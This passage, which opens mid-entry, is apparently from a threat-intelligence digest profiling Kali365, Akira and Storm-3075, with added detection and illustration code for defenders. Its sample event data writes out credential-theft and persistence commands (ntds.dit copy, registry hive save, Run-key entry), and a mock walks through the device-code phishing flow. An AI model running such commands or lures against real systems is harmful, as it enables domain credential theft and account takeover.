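       r"cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\ntds.dit C:\Windows\Temp\nt.dat"),
    ev(6, "DC01", r"C:\Windows\System32\reg.exe", r"reg save hklm\system C:\Windows\Temp\sy.dat"),
    ev(7, "DC01", r"C:\Windows\System32\wevtutil.exe", r"wevtutil epl Security C:\Windows\Temp\sec.evtx"),
    ev(9, "DC01", r"C:\Windows\System32\reg.exe",
       r"reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v local_update_check /t REG_SZ /d C:\Users\Public\wmipresv.exe"),
    ev(10, "DC01", r"C:\Users\Public\wmipresv.exe", "wmipresv.exe -c cfg.ini"),
    ev(12, "DC01", r"C:\Windows\System32\cmd.exe", r"cmd.exe /c rd /S /Q C:\Windows\Temp\work"),
]

if __name__ == "__main__":
    for sev, name, host, detail in sorted(evaluate(SAMPLE_EVENTS)):
        print(f"{sev:6s} {host:5s} {name:30s} {detail[:90]}")
```

The survey-burst rule is where most of the value sits: the individual commands are in every admin's history, but four distinct ones from one host within ten minutes, followed by a hive or ntds.dit copy into C:\Windows\Temp, is the pattern both advisories describe. Tune `window` and `min_survey` against a week of your own telemetry before alerting on it.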

Mentions: 3 · Origin: RU
#22 Kali365

Kali365, also referred to as K365, is a phishing-as-a-service (PhaaS) platform promoted primarily through Telegram; the cited reporting dates its first observation to April 2026 in one place and its emergence to March 2026 in another, a discrepancy the supplied material does not resolve. It is described as a subscription-based service, reportedly priced around $250 per month or $2,000 per year, that lowers the barrier for less-technical attackers by providing AI-generated phishing lures, automated campaign templates, real-time victim-tracking dashboards, and OAuth token capture. Kali365 initially focused on Microsoft 365 compromise by abusing Microsoft's OAuth 2.0 device authorization flow. In this workflow the operator initiates a legitimate device-code request, receives a device code and a short user code, and embeds the user code in a phishing page or lure. The victim is tricked into entering that code on Microsoft's legitimate device login endpoint and completes sign-in there, including MFA. Because the flow ties token issuance to the device code rather than to the session that approved it, Microsoft then issues access and refresh tokens to the client the attacker initiated. The attacker never handles a password or an MFA code, so MFA is sidestepped rather than broken, and the refresh token can provide persistent access to Microsoft 365 services such as Outlook, Teams, OneDrive, and other cloud applications. Reporting cited in the content states that Kali365 overtook EvilTokens in observed activity by May 2026. It has been associated with Microsoft-themed document-sharing and verification lures, multi-stage redirect chains, and abuse of trusted infrastructure and redirectors. Observed infrastructure includes Cloudflare Workers-hosted phishing pages and command-and-control components such as panel[.]securehubcloud[.]com, api[.]securehubcloud[.]com, and boss[.]securehubcloud[.]com. Arctic Wolf identified a live command-and-control panel branded internally as "K365 Control," a 126-host phishing cluster active in May 2026, and rotating infrastructure that impersonated brands including Microsoft Outlook, Microsoft Live, Okta SSO, Xerox DocuShare, LiveDrive, GMX, and AWS-style naming patterns.
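The device-code abuse above is easiest to see by playing both sides of the exchange. The following is an added illustration, not Kali365 code and not Microsoft's implementation: a minimal in-memory stand-in for the three endpoints of the OAuth 2.0 device authorization grant (RFC 8628), with the client id, account name and IP addresses constructed. It shows the attacker polling while the victim signs in with MFA on the legitimate page, and the tokens landing with the requester, plus the authorization_pending and expired_token paths.

```python
"""Mock OAuth 2.0 device authorization grant (RFC 8628) showing where the
tokens go in the device-code lure described above. Added illustration, not
Kali365 or Microsoft code: the server is an in-memory stand-in, the client
id, user names and IPs are constructed, and nothing touches the network."""
import secrets

AUTHORIZATION_PENDING = "authorization_pending"
EXPIRED_TOKEN = "expired_token"
USER_CODE_ALPHABET = "BCDFGHJKLMNPQRSTVWXZ"


class MockDeviceCodeServer:
    """Stand-in for the /devicecode, /devicelogin and /token endpoints."""

    def __init__(self, lifetime_s=900, interval_s=5):
        self.lifetime_s, self.interval_s = lifetime_s, interval_s
        self._grants = {}        # device_code -> grant state
        self._by_user_code = {}  # user_code -> device_code

    def devicecode(self, client_id, scope, requester_ip, now):
        """Attacker step 1: start the flow. Nobody authenticates here; the
        server simply binds a device_code to whoever asked."""
        device_code = secrets.token_urlsafe(32)
        user_code = "".join(secrets.choice(USER_CODE_ALPHABET) for _ in range(9))
        self._grants[device_code] = {
            "client_id": client_id, "scope": scope, "requester_ip": requester_ip,
            "expires_at": now + self.lifetime_s, "approved_by": None, "approver_ip": None}
        self._by_user_code[user_code] = device_code
        return {"device_code": device_code, "user_code": user_code,
                "verification_uri": "https://microsoft.com/devicelogin",
                "interval": self.interval_s, "expires_in": self.lifetime_s}

    def devicelogin(self, user_code, username, approver_ip, mfa_ok, now):
        """Victim step: types the code into the *legitimate* login page and
        passes MFA. The phishing page itself never sees a credential."""
        grant = self._grants.get(self._by_user_code.get(user_code))
        if grant is None or now > grant["expires_at"]:
            return {"error": EXPIRED_TOKEN}
        if not mfa_ok:
            return {"error": "mfa_required"}
        grant["approved_by"], grant["approver_ip"] = username, approver_ip
        return {"status": "approved"}

    def token(self, client_id, device_code, now):
        """Attacker step 2: poll. Issuance keys on device_code alone, so the
        tokens land with the requester, not with the user who approved."""
        grant = self._grants.get(device_code)
        if grant is None or grant["client_id"] != client_id:
            return {"error": "invalid_grant"}
        if now > grant["expires_at"]:
            return {"error": EXPIRED_TOKEN}
        if grant["approved_by"] is None:
            return {"error": AUTHORIZATION_PENDING}
        return {"token_type": "Bearer", "scope": grant["scope"],
                "access_token": secrets.token_urlsafe(32),
                "refresh_token": secrets.token_urlsafe(32),
                "issued_for_user": grant["approved_by"],
                "delivered_to_ip": grant["requester_ip"],
                "approved_from_ip": grant["approver_ip"]}


ATTACKER_IP, VICTIM_IP = "198.51.100.7", "203.0.113.45"   # constructed
CLIENT_ID = "example-public-client-id"                      # constructed


def run_lure(victim_completes=True, delay_s=60, lifetime_s=900):
    """Play the exchange end to end; returns (first poll, final poll, lure)."""
    srv = MockDeviceCodeServer(lifetime_s=lifetime_s)
    t0 = 1_700_000_000
    dc = srv.devicecode(CLIENT_ID, "openid offline_access", ATTACKER_IP, t0)
    lure = f"Verify your document: open {dc['verification_uri']} and enter {dc['user_code']}"
    first = srv.token(CLIENT_ID, dc["device_code"], t0 + dc["interval"])
    if victim_completes:
        srv.devicelogin(dc["user_code"], "alice@contoso.example", VICTIM_IP, True, t0 + delay_s)
    final = srv.token(CLIENT_ID, dc["device_code"], t0 + delay_s + dc["interval"])
    return first, final, lure


if __name__ == "__main__":
    first, final, lure = run_lure()
    print(lure)
    print(first)
    print(final)
```

The mock makes the defensive point explicit: nothing in the grant records who opened the phishing page, so the only control points are whether the tenant allows the device code flow at all (Entra Conditional Access can target it through the authentication-flows condition), which public clients may use it, and monitoring of sign-ins whose protocol is device code.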
The operation has expanded beyond Microsoft 365 token theft into a broader multi-brand phishing and account-compromise platform. Reported targets and impersonated services include Okta, Xerox DocuShare, LiveDrive, GMX, AWS naming patterns, Mail.ru, Yandex Disk, Odnoklassniki, and MAX Messenger. A notable campaign targeted users of Russia's MAX Messenger via a fake prize-claim page at greatness-marketing[.]top that collected Russian phone numbers, one-time passwords, and optional 2FA passwords, with captured data exfiltrated in real time through the Telegram bot @NovosibyrskyMoneyBot (also identified as sova_novosibirsk_bot). Arctic Wolf assessed this as the same operator expanding the original Kali365 operation. The content attributes Kali365 to a criminal phishing-service operation rather than a nation-state actor; the supplied material offers no high-confidence nation-state attribution.

Mentions: 3
#23 Akira

Akira is a financially motivated ransomware operation active since March 2023 and commonly referred to as Akira ransomware. Aliases present in the source content include akira_ransomware, akira_ransomware_actors, akira_ransomware_gang, akira_ransomware_group, Gold Sahara, Howling Scorpius, Punk Spider, and Storm-1567. The group uses a double-extortion model, stealing data before encrypting systems, and has targeted organizations across multiple sectors including education, finance, real estate, healthcare, manufacturing, and critical infrastructure. Joint government reporting cited in the content states Akira compromised more than 250 organizations worldwide and received more than $42 million in ransom payments since early 2023; other reporting in the content puts the victim count above 300. Akira has remained one of the most active ransomware brands in multiple datasets. The content states it ranked second in one 24-month leak-site dataset with 1,124 victims and was continuously operational across the full period. It is also described as among the most active groups in Q3 2025, as posting 201 attack claims in Q1 2026, and as a leading or top Ransomware-as-a-Service (RaaS) brand in 2025 reporting. The group has used multiple ransomware variants. Earlier Akira versions were written in C++ and appended the .akira extension. Since August 2023, some attacks have used the Rust-based Megazord variant, which appends the .powerranges extension. The content also states Akira developed a Linux encryptor to target VMware ESXi servers, and that operators have deployed different variants against different system architectures within the same intrusion. Akira ransomware uses a hybrid encryption scheme combining ChaCha20 and RSA and can perform full or partial encryption depending on file type and size.
Initial access methods directly mentioned in the content include abuse of VPN services without MFA, exposed RDP services, spear phishing, valid credentials, exploitation of Cisco vulnerabilities CVE-2020-3259 and CVE-2023-20269, exploitation of SonicWall SSL VPN access control flaw CVE-2024-40766, and exploitation of Veeam Backup & Replication flaw CVE-2024-40711. Multiple source excerpts also state that Akira regularly exploits exposed VPNs and remote services using stolen or weak credentials, often sourced from infostealers or phishing. The content specifically highlights repeated targeting of SonicWall appliances and SSL VPN infrastructure, including continued attacks using compromised accounts. Post-compromise tradecraft described in the content includes creation of new domain accounts for persistence, including an administrative account named itadm; credential theft via Kerberoasting and LSASS memory access; use of Mimikatz and LaZagne; network reconnaissance and remote host discovery with SoftPerfect, Advanced IP Scanner, and MASSCAN; use of net commands to identify domain controllers and trust relationships; and lateral movement via RDP. For command and control or remote access, the content mentions AnyDesk, RustDesk, Ngrok, and Cloudflare Tunnel. For exfiltration, Akira actors have used FileZilla, WinRAR, WinSCP, and RClone, including RClone uploads to cloud storage. Defense evasion noted in the content includes disabling security software and use of PowerTool with the Zemana AntiMalware driver to terminate antivirus-related processes. One source excerpt also notes Akira-linked intrusion chains using Cobalt Strike beacons and EDR-killing drivers. Victimology explicitly mentioned in the content includes attacks or claimed attacks against Nissan Australia and Stanford University. The content also notes Akira activity affecting the SME market and increased attacks on critical infrastructure.
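Two of the post-compromise behaviours above leave a clear trail in domain controller security logs: Kerberoasting shows up as one account requesting many RC4 service tickets in a short burst (event 4769 with encryption type 0x17), and the itadm-style persistence shows up as an account being created (4720) and promoted to an admin group (4728 or 4732) shortly afterwards. The following is an added example, not Akira tooling or any vendor's detection content; the events are constructed dicts and the field names, window sizes and thresholds are assumptions to tune locally.

```python
"""Hunt for two Akira post-compromise behaviours in Windows security events:
Kerberoasting (bursts of RC4 service-ticket requests, event 4769) and a
freshly created account being placed in an admin group (4720 followed by
4728/4732). Added example, not Akira or any vendor's code; the events are
constructed dicts and the field names are an assumption."""
from collections import defaultdict

RC4_HMAC = "0x17"          # encryption type requested by common Kerberoasting tools
ADMIN_GROUPS = {"administrators", "domain admins", "enterprise admins"}


def kerberoast_bursts(events, window=120, min_spns=5):
    """One account requesting >= min_spns distinct service tickets with RC4
    inside `window` seconds. Computer accounts (name$) and krbtgt are skipped."""
    by_user = defaultdict(list)
    for e in sorted(events, key=lambda e: e["ts"]):
        if e["id"] != 4769 or e["enc"].lower() != RC4_HMAC:
            continue
        if e["account"].endswith("$") or e["spn"].lower().startswith("krbtgt"):
            continue
        by_user[e["account"]].append((e["ts"], e["spn"]))
    alerts = []
    for user, seq in by_user.items():
        for i, (t0, _) in enumerate(seq):
            spns = {s for t, s in seq[i:] if t - t0 <= window}
            if len(spns) >= min_spns:
                alerts.append({"account": user, "ts": t0, "spns": sorted(spns)})
                break
    return alerts


def new_admin_accounts(events, window=3600):
    """A 4720 (account created) followed within `window` seconds by the same
    account being added to an admin group (4728 global / 4732 local)."""
    created = {e["target"].lower(): e for e in events if e["id"] == 4720}
    alerts = []
    for e in sorted(events, key=lambda e: e["ts"]):
        if e["id"] not in (4728, 4732) or e["group"].lower() not in ADMIN_GROUPS:
            continue
        c = created.get(e["member"].lower())
        if c and 0 <= e["ts"] - c["ts"] <= window:
            alerts.append({"account": e["member"], "created_by": c["subject"],
                           "group": e["group"], "gap_s": e["ts"] - c["ts"]})
    return alerts


# Constructed sample (not real logs): jdoe roasts six SPNs in 35 s, svc_backup
# requests one AES ticket, a computer account requests one RC4 ticket, and
# jdoe creates itadm then makes it a local administrator.
SAMPLE = [
    {"id": 4769, "ts": 1000 + 7 * i, "account": "jdoe", "spn": spn, "enc": "0x17"}
    for i, spn in enumerate(["MSSQLSvc/db01:1433", "MSSQLSvc/db02:1433", "HTTP/intranet",
                             "CIFS/files01", "exchangeMDB/mail01", "ldap/dc01"])
] + [
    {"id": 4769, "ts": 1050, "account": "svc_backup", "spn": "CIFS/files01", "enc": "0x12"},
    {"id": 4769, "ts": 1060, "account": "WS01$", "spn": "HOST/files01", "enc": "0x17"},
    {"id": 4720, "ts": 2000, "target": "itadm", "subject": "jdoe"},
    {"id": 4732, "ts": 2010, "member": "itadm", "group": "Administrators"},
    {"id": 4732, "ts": 2020, "member": "helpdesk", "group": "Administrators"},
]

if __name__ == "__main__":
    print(kerberoast_bursts(SAMPLE))
    print(new_admin_accounts(SAMPLE))
```

The RC4 filter matters: AES-only service accounts do not yield crackable RC4 tickets, so a burst of 0x17 requests from an ordinary user account is both the attacker's signal and the defender's, and it points at which service accounts still need AES-only configuration or a longer password.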
Reporting cited in the content says the group has accelerated attacks on critical infrastructure in recent months. The content characterizes Akira as part of the ransomware-as-a-service ecosystem. One cited report states that Akira and Qilin have shifted back toward encryption as a primary pressure mechanism as pure data extortion becomes less effective. Another cited article states that DragonForce, Play, Payload, Nova, and Akira operated with a shared RaaS model but no infrastructure overlap. The content also notes Microsoft linked Fox Tempest-enabled malware-signing activity to operations involving Akira.

Mentions: 3
#24 Storm-3075

Storm-3075 is a Microsoft-tracked initial access broker and malware distributor. Microsoft observed it using AI-themed malvertising to deliver payloads on behalf of multiple downstream actors. In the reported 2026 activity, Storm-3075 was linked to a fake product called "Awesome AI Windows Plugin" promoted through free movie streaming sites, and Microsoft also noted related AI-themed lures such as "Flux Pro AI." Microsoft attributed the "Awesome AI Windows Plugin" malvertising activity to Storm-3075 and reported that it has also distributed Vidar Stealer, Lumma Stealer, Hijack Loader, and Oyster in similar campaigns. In one documented campaign on March 13, 2026, a single Storm-3075 operation targeted more than 66,000 devices, with most impacted devices assessed as consumer endpoints. The top affected countries were Japan, South Africa, the United States, and France. The infection chain redirected users from free movie streaming sites to a GitHub-hosted download, including ProFluxeFlowAi-win-Setup.exe from a repository named shippingtechnologymovie in a folder named AI-techVideos. The executable was fraudulently code-signed with a Microsoft-issued certificate associated with Fox Tempest. The malware displayed a CAPTCHA-like or "Continue" checkbox before proceeding, which Microsoft assessed as an anti-analysis measure. After user interaction, it dropped pythonw.exe and LICENSE.txt into \AppData\Local\ and used a Python downloader or shellcode-loaded next stage to retrieve malware from brokeapt[.]com, ultimately delivering Vidar infostealer. Microsoft linked the malware-signing component in this activity to Fox Tempest, a financially motivated group operating a malware-signing-as-a-service used by multiple criminal actors. No additional aliases or sub-groups for Storm-3075 were provided in the source content.
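The chain above (signed installer run from a user-writable path, interpreter dropped into %LOCALAPPDATA%, interpreter child resolving and connecting to the download host) is worth detecting as a chain rather than as three separate alerts, since each piece on its own is common. The following is an added example, not Microsoft's detection logic: it correlates Sysmon-style process-create (1), network (3), file-create (11) and DNS (22) events by process GUID. The filename and domain are the ones the report names; the GUIDs, user path, IP, signer name and field layout are constructed.

```python
"""Correlate the reported Storm-3075 infection chain across Sysmon-style
events: a signed installer from a user-writable path drops a Python
interpreter into %LOCALAPPDATA%, which then resolves and connects out.
Added example, not Microsoft's detection logic; GUIDs, signer name, user
path and IP are constructed and field names follow Sysmon loosely."""

USER_WRITABLE = ("\\users\\", "\\appdata\\", "\\temp\\", "\\downloads\\")
KNOWN_PY_ROOTS = ("c:\\program files\\python", "c:\\program files (x86)\\python",
                  "\\appdata\\local\\programs\\python\\")  # assumed allowlist
INTERPRETERS = ("pythonw.exe", "python.exe")


def _is_relocated_interpreter(path):
    """A Python binary living somewhere no installer would put it."""
    p = path.lower()
    return p.endswith(INTERPRETERS) and not any(r in p for r in KNOWN_PY_ROOTS)


def find_chains(events):
    """Return one record per root process whose descendants reproduce the
    drop -> execute -> resolve/connect pattern."""
    procs = {e["guid"]: e for e in events if e["eid"] == 1}
    children = {}
    for e in procs.values():
        children.setdefault(e.get("parent_guid"), []).append(e["guid"])

    def descendants(guid):
        out, stack = [], [guid]
        while stack:
            for c in children.get(stack.pop(), []):
                out.append(c)
                stack.append(c)
        return out

    chains = []
    for guid, root in procs.items():
        img = root["image"].lower()
        # candidate roots: binaries launched from user-writable paths that are
        # not themselves the interpreter
        if not any(s in img for s in USER_WRITABLE) or img.endswith(INTERPRETERS):
            continue
        drops = [e["target"] for e in events
                 if e["eid"] == 11 and e["guid"] == guid and _is_relocated_interpreter(e["target"])]
        if not drops:
            continue
        tree = set(descendants(guid))
        runs = [procs[g]["image"] for g in tree if _is_relocated_interpreter(procs[g]["image"])]
        net = [e.get("query") or e.get("dest") for e in events
               if e["eid"] in (3, 22) and e["guid"] in tree]
        if runs and net:
            chains.append({"root": root["image"], "signed": root.get("signed"),
                           "signer": root.get("signer"), "dropped": drops,
                           "executed": runs, "network": net})
    return chains


# Constructed telemetry. Chain A mirrors the reported pattern; B is a normal
# Python install whose interpreter talks to the network and must not fire.
SAMPLE = [
    {"eid": 1, "guid": "A1", "parent_guid": "EXPLORER", "signed": True,
     "signer": "Example Signer Ltd",   # constructed stand-in for the abused cert
     "image": r"C:\Users\kim\Downloads\ProFluxeFlowAi-win-Setup.exe"},
    {"eid": 11, "guid": "A1", "target": r"C:\Users\kim\AppData\Local\pythonw.exe"},
    {"eid": 11, "guid": "A1", "target": r"C:\Users\kim\AppData\Local\LICENSE.txt"},
    {"eid": 1, "guid": "A2", "parent_guid": "A1", "signed": False,
     "image": r"C:\Users\kim\AppData\Local\pythonw.exe"},
    {"eid": 22, "guid": "A2", "query": "brokeapt.com"},
    {"eid": 3, "guid": "A2", "dest": "203.0.113.9:443"},
    {"eid": 1, "guid": "B1", "parent_guid": "EXPLORER", "signed": True,
     "image": r"C:\Program Files\Python312\pythonw.exe"},
    {"eid": 22, "guid": "B1", "query": "pypi.org"},
]

if __name__ == "__main__":
    for chain in find_chains(SAMPLE):
        print(chain)
```

Note that the root's valid signature is carried into the alert rather than used to suppress it: the point of the reported activity is that a signature from a legitimately issued certificate says nothing about where the binary came from or what it drops.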

Mentions: 3